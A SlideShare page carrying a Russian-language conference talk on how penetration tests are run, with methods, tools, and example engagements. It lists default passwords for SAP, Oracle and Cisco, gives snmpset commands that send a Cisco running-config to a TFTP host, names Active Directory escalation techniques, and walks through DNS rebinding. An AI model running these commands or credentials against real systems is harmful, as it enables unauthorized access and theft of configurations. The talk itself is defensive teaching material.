SlideShare a Scribd company logo
Penetration testing AS IS Дмитрий Евтеев ( Positive  Technologies)
Penetration testing internals Тестирование на проникновение != моделирование действий (не)реального  злоумышленника Тестирование на проникновение != инструментальное сканирование с ручной верификацией уязвимостей Тестирование на проникновение – это комплекс мероприятий, направленных на оценку текущего состояния процессов обеспечения ИБ тестирование на преодоление защиты это один из методов проведения аудита ИБ
Методика С одной стороны это Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … С другой стороны это Center of Internet Security (CIS) guides Стандарты серии  ISO 2700x …
Возможности Механизм  N … X Управление инцидентами Некоторые действия атакующей стороны были выявлены, но не были идентифицированы как атака. 2 Механизм  N … X
Цели Высокоуровневые Внутренняя политика (пентест, как инструмент воздействия) Оценка текущего состояния процессов обеспечения ИБ Так надо ( compliance ) Технологические Осуществить НСД во внутреннюю сеть со стороны сети Интернет Получить максимальные привилегии в основных инфраструктурных системах ( Active Directory,  сетевое оборудование, СУБД,  ERP  и пр.) Получить доступ к определенным информационным ресурсам Получить доступ к определенным данным (информации)
Подходы Периметровый пентест (с последующим развитием атаки во внутренней сети) С уведомлением и без уведомления администраторов Анализ защищенности беспроводных сетей Внутренний пентест С рабочего места среднестатистического пользователя сети Из выбранного сегмента сети Тестирование отдельного компонента информационной системы (анализ защищенности) Черный-, серый- белый-ящик Оценка осведомленности сотрудников компании в вопросах информационной безопасности
Реальная атака  VS  тестирование на проникновение Для непосредственного исполнителя пентест – это ВЗЛОМ! Ограничения Соблюдение законов РФ Ограниченное время Минимизация воздействия Отсутствие услуги тестирования типа  DDoS Неудобства Согласование действий (порой это доходит до абсурда!) Ответственность / Аккуратность Преимущества Не нужно скрывать свою активность Упрощение процесса по идентификации периметра сети Возможность перехода к серому- и белому-ящику
Используемые инструменты Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack…) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Браузер, блокнот…
Используемые инструменты База знаний методов использования уязвимостей информационных систем
Проблема защиты  Web -приложений Наиболее часто встречающиеся уязвимости веб-приложений при проведении анализа методом «черного ящика» (данные за 2009 год,  http://ptsecurity.ru/analytics.asp )
Примеры пентестов : Web- приложения Что такое пентест веб-приложения методикой черного-ящика ? Web- сервер Рабочее место аудитора Проверка 1 Проверка  N Найдена уязвимость Уязвимость 1: подбор пароля Impact: доступ к приложению (с ограниченными привилегиями) Уязвимость 2: внедрение операторов SQL Impact: только чтение файлов (включена опция magic quotes) Уязвимость 3: выход за каталог Impact: только чтение файлов (потенциально LFI) Уязвимость 4: предсказуемое значение идентификатора загружаемого файла Уязвимость 3 + Уязвимость 4 = Impact: выполнение команд на сервере Следующий шаг - РАЗВИТИЕ АТАКИ
Проблема слабых паролей Используется рекомендованная политика по заданию паролей Пароль администратора такого домена ? ( совпадает с логином )
Примеры пентестов :  Подбор паролей (дефолты) Общепринятые admin:123456 Administrator:P@ssw0rd … SAP (DIAG)  SAP*: 06071992, PASS манданты:   000, 001, 066, все новые (RFC)  SAPCPIC: ADMIN манданты:000, 001, 066, все новые … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …
Примеры пентестов :  Подбор паролей ( MS Exchange 0day )
Примеры пентестов :  Привет Павлик  :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
Проблема разграничения доступа Сетевой доступ Архитектура сети (ДМЗ, технологическая сеть, пользовательский сегмент, тестовая среда) Удаленный доступ к сети Доступ к данным Общие ресурсы (пароли в открытом виде, резервные копии данных, различная чувствительная информация) Web- приложения, СУБД,  ERP
Проблема управления доступом Разделение полномочий между администраторами Пользователи с повышенными привилегиями Сервисы (!) с не требуемым уровнем доступа Общая проблема управления идентификаторами
Примеры пентестов :  Использование уязвимостей CANVAS && Metasploit
Примеры пентестов :  Расширение привилегий в  Active Directory Вариант 1 :  Подбор пароля Вариант 2 :  Использование уязвимостей в сервисах на контроллерах домена Вариант 3 :  Проведение атаки  Pass-the-hash Вариант  4:  Создание нового пользователя с доменного компьютера, который посещает администратор домена  (eq incognito, wce, …) Вариант 5 :  Проведение атаки типа «Отравление  ARP  кэша» (например, перехват сессии  RDP,  понижение уровня проверки подлинности до  LM ) Вариант  6:  Проведение атаки  NTLM Relay Вариант  7:  Нахождение   и восстановление  system state  домена (например, после успешной атаки на сервер резервного копирования) Вариант 8 :  Получение расширенных привилегий за счет других систем (пример, контроль над записями в корневых  DNS  компании) Вариант 9 :  Получение расширенных привилегий за счет уязвимостей других систем (хранение паролей с использованием обратимого шифрования, использование небезопасных протоколов и т.д.) Вариант  N …
Примеры пентестов :  Анализ защищенности Сканирование сети Успешно подобран пароль! Эксплуатация  SQL Injection Выполнение команд на сервере Повышение привилегий Атака на внутренние ресурсы Внутренний пентест Установка сканера  MaxPatrol Поиск уязвимостей Эксплуатация уязвимостей Перемещение в ИС ЦО Проведение атаки на ресурсы ЦО Получение максимальных привилегий во всей сети!
Примеры пентестов :  Анализ защищенности
Примеры пентестов :  Беспроводные сети
Примеры пентестов :  Оценка эффективности программы повышения осведомленности Рассылка провоцирующих сообщений по электронной почте Рассылка провоцирующих сообщений с помощью системы ICQ (и других IM) Распространение носителей информации, содержащих провоцирующие данные Проведение опроса среди сотрудников Живой разговор (по телефону,  skype )
Примеры пентестов :  Пример набора проверок Описание сообщения Реализуемая атака Контролируемые события Сообщение от авторитетного лица, содержащее приложенный исполняемый файл. Распространение сетевых червей. Целевое заражение системы троянской программой. Открытие почтового сообщения. Запуск приложенного файла. Сообщение от внутреннего лица, содержащее ссылку на Web-сайт. Ссылка указывает на исполняемый файл.  Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Загрузка файла с Web-сервера. Запуск файла. Сообщение от авторитетного лица, содержащее ссылку на Web-сайт. Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Переход по предложенной ссылке.
Примеры пентестов :  Оценка эффективности программы повышения осведомленности
Будущее  client-side  атак за « DNS rebinding » Атака &quot;Anti DNS Pinning&quot; (DNS rebinding) Обход ограничений  Same origin policy Позволяет злоумышленнику манипулировать соответствием между IP-адресом и DNS-именем узла (FQDN) с целью запуска активного содержимого в контексте безопасности уязвимого сайта. Используя эту технику, злоумышленник может использовать браузер жертвы для получения доступа к защищенным сайтам (например, находящимся за межсетевыми экранами или требующим аутентификации). В отличии от атаки типа «Подделка межсайтового запроса» (Cross-Site Request Forgery, CSRF), атака Anti DNS Pinning направлена на получение данных (нарушение конфиденциальности), а не на выполнение каких-либо действий с приложением (нарушение целостности). Но совместно с CSRF атака Anti DNS Pinning может использоваться для полнофункционального доступа к  w eb-приложению через браузер пользователя. BlackHat USA07 David Byrne, https://www.blackhat.com/presentations/bh-usa-07/Byrne/Presentation/bh-usa-07-byrne.pdf; http://ha.ckers.org/blog/20060908/dns-pinning-just-got-worse/; http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html
Уязвимость типа « Anti DNS Pinning » Контролируемый  web- сервер www.hack.example  (1.1.1.1) MS Project Server 192.168.0.1 Прочие 1. Пользователь обращается  к внешнему  web- серверу Контролируемый  DNS- сервер hack.example Контролируемый  web- сервер any.name Cisco SDM 192.168.0.2
Уязвимость типа « Anti DNS Pinning » MS Project Server 192.168.0.1 Прочие 2 . Полученный сценарий  java-script , например, через 2 секунды делает повторное обращение Контролируемый  DNS- сервер hack.example Контролируемый  web- сервер any.name 3. Атакующий блокирует доступ к  web- серверу Cisco SDM 192.168.0.2 Контролируемый  web- сервер www.hack.example  (1.1.1.1)
Уязвимость типа « Anti DNS Pinning » MS Project Server 192.168.0.1 Прочие 4. Происходит повторное разрешение имени  www.hack.example Контролируемый  DNS- сервер hack.example Контролируемый  web- сервер any.name 5.  www.hack.example   IN A 192.168.0.1 Cisco SDM 192.168.0.2 Контролируемый  web- сервер www.hack.example  (1.1.1.1)
Уязвимость типа « Anti DNS Pinning » MS Project Server 192.168.0.1 Прочие 6 . Браузер посылает запрос на 192.168.0.1 : GET / HTTP/1.1 Host: www.hack.example … Контролируемый  DNS- сервер hack.example Контролируемый  web- сервер any.name 5.  www.hack.example   IN A 192.168.0.1 Cisco SDM 192.168.0.2 Контролируемый  web- сервер www.hack.example  (1.1.1.1)
Уязвимость типа « Anti DNS Pinning » Cisco SDM 192.168.0.2 MS Project Server 192.168.0.1 Прочие Контролируемый  DNS- сервер hack.example Контролируемый  web- сервер any.name 7.  Образуется полноценный канал для работы с внутренним ресурсом Контролируемый  web- сервер www.hack.example  (1.1.1.1)
Резюме Тестирование на проникновение  –  это комплекс мероприятий, позволяющий провести эффективную оценку текущего состояния процессов обеспечения информационной безопасности Тестирование на проникновение  –  это поиск и использование недостатков в процессах обеспечения информационной безопасности управление уязвимостями управление конфигурациями управление инцидентами управление безопасностью веб-приложений, СУБД,  ERP,  проводными и беспроводными сетями и пр. etc
PS.  Тестирование на проникновение бывает разным…
Спасибо за внимание! [email_address] http://devteev.blogspot.com/

More Related Content

What's hot (20)

PPTX
RuSIEM 2016
Olesya Shelestova
 
PPTX
Тестирование на проникновение
Учебный центр "Эшелон"
 
PPTX
RuSIEM (15.11.2015)
Olesya Shelestova
 
PPTX
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Denis Batrankov, CISSP
 
PPS
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
PPTX
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
Dmitry Evteev
 
PPS
Check Piont. Чекрыгин Сергей. "На один шаг впереди"
Expolink
 
PPTX
SIEM для ИТ
Olesya Shelestova
 
PPS
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
PPTX
RuSIEM
Olesya Shelestova
 
PDF
Найти и обезвредить
Cisco Russia
 
PPTX
автоматизируем пентест Wifi сети
Olesya Shelestova
 
PPTX
этичный хакинг и тестирование на проникновение (Publ)
Teymur Kheirkhabarov
 
PDF
Как банки обеспечивают свою безопасность
Andrey Apuhtin
 
PPTX
Тестирование на проникновение в сетях Microsoft (v.2)
Dmitry Evteev
 
PPTX
Типовые проблемы безопасности банковских систем
Dmitry Evteev
 
PPTX
Cis critical security controls. контроль 3 безопасная конфигурация устройств
Teymur Kheirkhabarov
 
PPS
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
PPT
Мобильный офис глазами пентестера
Dmitry Evteev
 
PDF
Технология защиты от Malware на базе SourceFire FireAMP
Cisco Russia
 
RuSIEM 2016
Olesya Shelestova
 
Тестирование на проникновение
Учебный центр "Эшелон"
 
RuSIEM (15.11.2015)
Olesya Shelestova
 
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Denis Batrankov, CISSP
 
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
Dmitry Evteev
 
Check Piont. Чекрыгин Сергей. "На один шаг впереди"
Expolink
 
SIEM для ИТ
Olesya Shelestova
 
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
Найти и обезвредить
Cisco Russia
 
автоматизируем пентест Wifi сети
Olesya Shelestova
 
этичный хакинг и тестирование на проникновение (Publ)
Teymur Kheirkhabarov
 
Как банки обеспечивают свою безопасность
Andrey Apuhtin
 
Тестирование на проникновение в сетях Microsoft (v.2)
Dmitry Evteev
 
Типовые проблемы безопасности банковских систем
Dmitry Evteev
 
Cis critical security controls. контроль 3 безопасная конфигурация устройств
Teymur Kheirkhabarov
 
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
Мобильный офис глазами пентестера
Dmitry Evteev
 
Технология защиты от Malware на базе SourceFire FireAMP
Cisco Russia
 

Viewers also liked (19)

PDF
Mobile Device Security
qqlan
 
PPTX
CodeFest 2012. Белов С. — Пентест на стероидах. Автоматизируем процесс
CodeFest
 
PPT
Pentest requirements
Glib Pakharenko
 
PDF
Alexey Sintsov - Where do the money lie
DefconRussia
 
PPTX
Avoid the Hack
Jason Jakus
 
PDF
Kaspersky SAS SCADA in the Cloud
qqlan
 
PPTX
Что общего у CTF и тестов на проникновение?
beched
 
PPT
Defcon Moscow #0x0A - Dmitry Evteev "Pentest vs. APT"
Defcon Moscow
 
PPTX
Web security
Sync.NET
 
PPTX
Database honeypot by design
qqlan
 
PDF
С чего начать свой путь этичного хакера?
Vadym_Chakrian
 
PDF
Wps pixie dust attack
invad3rsam
 
PDF
#root это только начало
Vlad Styran
 
PDF
Сканирование уязвимостей со вкусом Яндекса. Тарас Иващенко, Яндекс
yaevents
 
PPTX
Кое-что о Wi-Fi (Денис Жевнер)
IT Club Mykolayiv
 
PPTX
Wi Fi Security
yousef emami
 
PPTX
Угадываем пароль за минуту
Positive Hack Days
 
PPTX
Миссиоцентрический подход к кибербезопасности АСУ ТП
qqlan
 
PDF
D1 t1 t. yunusov k. nesterov - bootkit via sms
qqlan
 
Mobile Device Security
qqlan
 
CodeFest 2012. Белов С. — Пентест на стероидах. Автоматизируем процесс
CodeFest
 
Pentest requirements
Glib Pakharenko
 
Alexey Sintsov - Where do the money lie
DefconRussia
 
Avoid the Hack
Jason Jakus
 
Kaspersky SAS SCADA in the Cloud
qqlan
 
Что общего у CTF и тестов на проникновение?
beched
 
Defcon Moscow #0x0A - Dmitry Evteev "Pentest vs. APT"
Defcon Moscow
 
Web security
Sync.NET
 
Database honeypot by design
qqlan
 
С чего начать свой путь этичного хакера?
Vadym_Chakrian
 
Wps pixie dust attack
invad3rsam
 
#root это только начало
Vlad Styran
 
Сканирование уязвимостей со вкусом Яндекса. Тарас Иващенко, Яндекс
yaevents
 
Кое-что о Wi-Fi (Денис Жевнер)
IT Club Mykolayiv
 
Wi Fi Security
yousef emami
 
Угадываем пароль за минуту
Positive Hack Days
 
Миссиоцентрический подход к кибербезопасности АСУ ТП
qqlan
 
D1 t1 t. yunusov k. nesterov - bootkit via sms
qqlan
 
Ad

Similar to Penetration testing (AS IS) (20)

PPT
Ломаем (и строим) вместе
Dmitry Evteev
 
PDF
CodeFest 2012 - Пентест на стероидах
Sergey Belov
 
PPTX
penetest VS. APT
HeadLightSecurity
 
PPTX
penetest VS. APT
Dmitry Evteev
 
PDF
Типовые атаки на корпоративную информационную систему (КИС)
Альбина Минуллина
 
PPTX
Umurashka codeib-presentation-v2
Uladzislau Murashka
 
PPT
Дащенко Владимир (УЦСБ) - Практический опыт проведения тестирований на проник...
Expolink
 
PPTX
Белов наиболее часто уязвимые места в веб приложениях
qasib
 
PPTX
From ERP to SCADA and back
qqlan
 
PPTX
#1 razvedka i sbor dannih
Uladzislau Murashka
 
PDF
Методологии аудита информационной безопасности
Positive Hack Days
 
PDF
Прелюдия к атаке: практика и автоматизация OSINT
Vlad Styran
 
PPT
IBM Proventia IPS
Петр Королев
 
PPT
Positive Hack Days. Баранов. DNS Rebinding возвращается (0-day)
Positive Hack Days
 
PPTX
Как увидеть невидимые инциденты
Positive Hack Days
 
PPTX
QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для...
QAFest
 
DOC
Pentest Report Sample
Training center "Echelon"
 
PPTX
Тесты на проникновение как основа реальной оценки состояния ИБ в организации
LETA IT-company
 
PDF
Практика исследования защищенности российских компаний.
Cisco Russia
 
Ломаем (и строим) вместе
Dmitry Evteev
 
CodeFest 2012 - Пентест на стероидах
Sergey Belov
 
penetest VS. APT
HeadLightSecurity
 
penetest VS. APT
Dmitry Evteev
 
Типовые атаки на корпоративную информационную систему (КИС)
Альбина Минуллина
 
Umurashka codeib-presentation-v2
Uladzislau Murashka
 
Дащенко Владимир (УЦСБ) - Практический опыт проведения тестирований на проник...
Expolink
 
Белов наиболее часто уязвимые места в веб приложениях
qasib
 
From ERP to SCADA and back
qqlan
 
#1 razvedka i sbor dannih
Uladzislau Murashka
 
Методологии аудита информационной безопасности
Positive Hack Days
 
Прелюдия к атаке: практика и автоматизация OSINT
Vlad Styran
 
IBM Proventia IPS
Петр Королев
 
Positive Hack Days. Баранов. DNS Rebinding возвращается (0-day)
Positive Hack Days
 
Как увидеть невидимые инциденты
Positive Hack Days
 
QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для...
QAFest
 
Pentest Report Sample
Training center "Echelon"
 
Тесты на проникновение как основа реальной оценки состояния ИБ в организации
LETA IT-company
 
Практика исследования защищенности российских компаний.
Cisco Russia
 
Ad

More from Dmitry Evteev (20)

PPTX
Противодействие хищению персональных данных и платежной информации в сети Инт...
Dmitry Evteev
 
PPTX
Уязвимости систем ДБО в 2011-2012 гг.
Dmitry Evteev
 
PPTX
Статистика по результатам тестирований на проникновение и анализа защищенност...
Dmitry Evteev
 
PPT
Реальные опасности виртуального мира.
Dmitry Evteev
 
PPTX
Истории из жизни. Как взламывают сети крупных организаций.
Dmitry Evteev
 
PPTX
Демонстрация атаки на ДБО
Dmitry Evteev
 
PPTX
Услуги PT для банков
Dmitry Evteev
 
PPTX
PHDays 2012: Future Now
Dmitry Evteev
 
PPTX
Такой (не)безопасный веб
Dmitry Evteev
 
PPTX
Собираем команду хакеров
Dmitry Evteev
 
PPTX
Тестирование на проникновение в сетях Microsoft
Dmitry Evteev
 
PPT
PHDays CTF 2011 Quals/Afterparty: как это было
Dmitry Evteev
 
PPTX
Как взламывают сети государственных учреждений
Dmitry Evteev
 
PPT
Введение в тему безопасности веб-приложений
Dmitry Evteev
 
PPT
Практика проведения DDoS-тестирований
Dmitry Evteev
 
PPT
Безопасность веб-приложений сегодня
Dmitry Evteev
 
PPT
CC HackQuest 2010 Full Disclosure (мастер-класс)
Dmitry Evteev
 
DOC
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Dmitry Evteev
 
DOC
РусКрипто CTF 2010 Full Disclosure (мастер класс)
Dmitry Evteev
 
PPT
РусКрипто CTF 2010 Full Disclosure (мастер класс)
Dmitry Evteev
 
Противодействие хищению персональных данных и платежной информации в сети Инт...
Dmitry Evteev
 
Уязвимости систем ДБО в 2011-2012 гг.
Dmitry Evteev
 
Статистика по результатам тестирований на проникновение и анализа защищенност...
Dmitry Evteev
 
Реальные опасности виртуального мира.
Dmitry Evteev
 
Истории из жизни. Как взламывают сети крупных организаций.
Dmitry Evteev
 
Демонстрация атаки на ДБО
Dmitry Evteev
 
Услуги PT для банков
Dmitry Evteev
 
PHDays 2012: Future Now
Dmitry Evteev
 
Такой (не)безопасный веб
Dmitry Evteev
 
Собираем команду хакеров
Dmitry Evteev
 
Тестирование на проникновение в сетях Microsoft
Dmitry Evteev
 
PHDays CTF 2011 Quals/Afterparty: как это было
Dmitry Evteev
 
Как взламывают сети государственных учреждений
Dmitry Evteev
 
Введение в тему безопасности веб-приложений
Dmitry Evteev
 
Практика проведения DDoS-тестирований
Dmitry Evteev
 
Безопасность веб-приложений сегодня
Dmitry Evteev
 
CC HackQuest 2010 Full Disclosure (мастер-класс)
Dmitry Evteev
 
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Dmitry Evteev
 
РусКрипто CTF 2010 Full Disclosure (мастер класс)
Dmitry Evteev
 
РусКрипто CTF 2010 Full Disclosure (мастер класс)
Dmitry Evteev
 

Penetration testing (AS IS)

  • 1. Penetration testing AS IS Дмитрий Евтеев ( Positive Technologies)
  • 2. Penetration testing internals Тестирование на проникновение != моделирование действий (не)реального злоумышленника Тестирование на проникновение != инструментальное сканирование с ручной верификацией уязвимостей Тестирование на проникновение – это комплекс мероприятий, направленных на оценку текущего состояния процессов обеспечения ИБ тестирование на преодоление защиты это один из методов проведения аудита ИБ
  • 3. Методика С одной стороны это Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … С другой стороны это Center of Internet Security (CIS) guides Стандарты серии ISO 2700x …
  • 4. Возможности Механизм N … X Управление инцидентами Некоторые действия атакующей стороны были выявлены, но не были идентифицированы как атака. 2 Механизм N … X
  • 5. Цели Высокоуровневые Внутренняя политика (пентест, как инструмент воздействия) Оценка текущего состояния процессов обеспечения ИБ Так надо ( compliance ) Технологические Осуществить НСД во внутреннюю сеть со стороны сети Интернет Получить максимальные привилегии в основных инфраструктурных системах ( Active Directory, сетевое оборудование, СУБД, ERP и пр.) Получить доступ к определенным информационным ресурсам Получить доступ к определенным данным (информации)
  • 6. Подходы Периметровый пентест (с последующим развитием атаки во внутренней сети) С уведомлением и без уведомления администраторов Анализ защищенности беспроводных сетей Внутренний пентест С рабочего места среднестатистического пользователя сети Из выбранного сегмента сети Тестирование отдельного компонента информационной системы (анализ защищенности) Черный-, серый- белый-ящик Оценка осведомленности сотрудников компании в вопросах информационной безопасности
  • 7. Реальная атака VS тестирование на проникновение Для непосредственного исполнителя пентест – это ВЗЛОМ! Ограничения Соблюдение законов РФ Ограниченное время Минимизация воздействия Отсутствие услуги тестирования типа DDoS Неудобства Согласование действий (порой это доходит до абсурда!) Ответственность / Аккуратность Преимущества Не нужно скрывать свою активность Упрощение процесса по идентификации периметра сети Возможность перехода к серому- и белому-ящику
  • 8. Используемые инструменты Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack…) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Браузер, блокнот…
  • 9. Используемые инструменты База знаний методов использования уязвимостей информационных систем
  • 10. Проблема защиты Web -приложений Наиболее часто встречающиеся уязвимости веб-приложений при проведении анализа методом «черного ящика» (данные за 2009 год, http://ptsecurity.ru/analytics.asp )
  • 11. Примеры пентестов : Web- приложения Что такое пентест веб-приложения методикой черного-ящика ? Web- сервер Рабочее место аудитора Проверка 1 Проверка N Найдена уязвимость Уязвимость 1: подбор пароля Impact: доступ к приложению (с ограниченными привилегиями) Уязвимость 2: внедрение операторов SQL Impact: только чтение файлов (включена опция magic quotes) Уязвимость 3: выход за каталог Impact: только чтение файлов (потенциально LFI) Уязвимость 4: предсказуемое значение идентификатора загружаемого файла Уязвимость 3 + Уязвимость 4 = Impact: выполнение команд на сервере Следующий шаг - РАЗВИТИЕ АТАКИ
  • 12. Проблема слабых паролей Используется рекомендованная политика по заданию паролей Пароль администратора такого домена ? ( совпадает с логином )
  • 13. Примеры пентестов : Подбор паролей (дефолты) Общепринятые admin:123456 Administrator:P@ssw0rd … SAP (DIAG) SAP*: 06071992, PASS манданты: 000, 001, 066, все новые (RFC) SAPCPIC: ADMIN манданты:000, 001, 066, все новые … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …
  • 14. Примеры пентестов : Подбор паролей ( MS Exchange 0day )
  • 15. Примеры пентестов : Привет Павлик :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
  • 16. Проблема разграничения доступа Сетевой доступ Архитектура сети (ДМЗ, технологическая сеть, пользовательский сегмент, тестовая среда) Удаленный доступ к сети Доступ к данным Общие ресурсы (пароли в открытом виде, резервные копии данных, различная чувствительная информация) Web- приложения, СУБД, ERP
  • 17. Проблема управления доступом Разделение полномочий между администраторами Пользователи с повышенными привилегиями Сервисы (!) с не требуемым уровнем доступа Общая проблема управления идентификаторами
  • 18. Примеры пентестов : Использование уязвимостей CANVAS && Metasploit
  • 19. Примеры пентестов : Расширение привилегий в Active Directory Вариант 1 : Подбор пароля Вариант 2 : Использование уязвимостей в сервисах на контроллерах домена Вариант 3 : Проведение атаки Pass-the-hash Вариант 4: Создание нового пользователя с доменного компьютера, который посещает администратор домена (eq incognito, wce, …) Вариант 5 : Проведение атаки типа «Отравление ARP кэша» (например, перехват сессии RDP, понижение уровня проверки подлинности до LM ) Вариант 6: Проведение атаки NTLM Relay Вариант 7: Нахождение и восстановление system state домена (например, после успешной атаки на сервер резервного копирования) Вариант 8 : Получение расширенных привилегий за счет других систем (пример, контроль над записями в корневых DNS компании) Вариант 9 : Получение расширенных привилегий за счет уязвимостей других систем (хранение паролей с использованием обратимого шифрования, использование небезопасных протоколов и т.д.) Вариант N …
  • 20. Примеры пентестов : Анализ защищенности Сканирование сети Успешно подобран пароль! Эксплуатация SQL Injection Выполнение команд на сервере Повышение привилегий Атака на внутренние ресурсы Внутренний пентест Установка сканера MaxPatrol Поиск уязвимостей Эксплуатация уязвимостей Перемещение в ИС ЦО Проведение атаки на ресурсы ЦО Получение максимальных привилегий во всей сети!
  • 21. Примеры пентестов : Анализ защищенности
  • 22. Примеры пентестов : Беспроводные сети
  • 23. Примеры пентестов : Оценка эффективности программы повышения осведомленности Рассылка провоцирующих сообщений по электронной почте Рассылка провоцирующих сообщений с помощью системы ICQ (и других IM) Распространение носителей информации, содержащих провоцирующие данные Проведение опроса среди сотрудников Живой разговор (по телефону, skype )
  • 24. Примеры пентестов : Пример набора проверок Описание сообщения Реализуемая атака Контролируемые события Сообщение от авторитетного лица, содержащее приложенный исполняемый файл. Распространение сетевых червей. Целевое заражение системы троянской программой. Открытие почтового сообщения. Запуск приложенного файла. Сообщение от внутреннего лица, содержащее ссылку на Web-сайт. Ссылка указывает на исполняемый файл. Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Загрузка файла с Web-сервера. Запуск файла. Сообщение от авторитетного лица, содержащее ссылку на Web-сайт. Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Переход по предложенной ссылке.
  • 25. Примеры пентестов : Оценка эффективности программы повышения осведомленности
  • 26. Будущее client-side атак за « DNS rebinding » Атака &quot;Anti DNS Pinning&quot; (DNS rebinding) Обход ограничений Same origin policy Позволяет злоумышленнику манипулировать соответствием между IP-адресом и DNS-именем узла (FQDN) с целью запуска активного содержимого в контексте безопасности уязвимого сайта. Используя эту технику, злоумышленник может использовать браузер жертвы для получения доступа к защищенным сайтам (например, находящимся за межсетевыми экранами или требующим аутентификации). В отличии от атаки типа «Подделка межсайтового запроса» (Cross-Site Request Forgery, CSRF), атака Anti DNS Pinning направлена на получение данных (нарушение конфиденциальности), а не на выполнение каких-либо действий с приложением (нарушение целостности). Но совместно с CSRF атака Anti DNS Pinning может использоваться для полнофункционального доступа к w eb-приложению через браузер пользователя. BlackHat USA07 David Byrne, https://www.blackhat.com/presentations/bh-usa-07/Byrne/Presentation/bh-usa-07-byrne.pdf; http://ha.ckers.org/blog/20060908/dns-pinning-just-got-worse/; http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html
  • 27. Уязвимость типа « Anti DNS Pinning » Контролируемый web- сервер www.hack.example (1.1.1.1) MS Project Server 192.168.0.1 Прочие 1. Пользователь обращается к внешнему web- серверу Контролируемый DNS- сервер hack.example Контролируемый web- сервер any.name Cisco SDM 192.168.0.2
  • 28. Уязвимость типа « Anti DNS Pinning » MS Project Server 192.168.0.1 Прочие 2 . Полученный сценарий java-script , например, через 2 секунды делает повторное обращение Контролируемый DNS- сервер hack.example Контролируемый web- сервер any.name 3. Атакующий блокирует доступ к web- серверу Cisco SDM 192.168.0.2 Контролируемый web- сервер www.hack.example (1.1.1.1)
  • 29. Уязвимость типа « Anti DNS Pinning » MS Project Server 192.168.0.1 Прочие 4. Происходит повторное разрешение имени www.hack.example Контролируемый DNS- сервер hack.example Контролируемый web- сервер any.name 5. www.hack.example IN A 192.168.0.1 Cisco SDM 192.168.0.2 Контролируемый web- сервер www.hack.example (1.1.1.1)
  • 30. Уязвимость типа « Anti DNS Pinning » MS Project Server 192.168.0.1 Прочие 6 . Браузер посылает запрос на 192.168.0.1 : GET / HTTP/1.1 Host: www.hack.example … Контролируемый DNS- сервер hack.example Контролируемый web- сервер any.name 5. www.hack.example IN A 192.168.0.1 Cisco SDM 192.168.0.2 Контролируемый web- сервер www.hack.example (1.1.1.1)
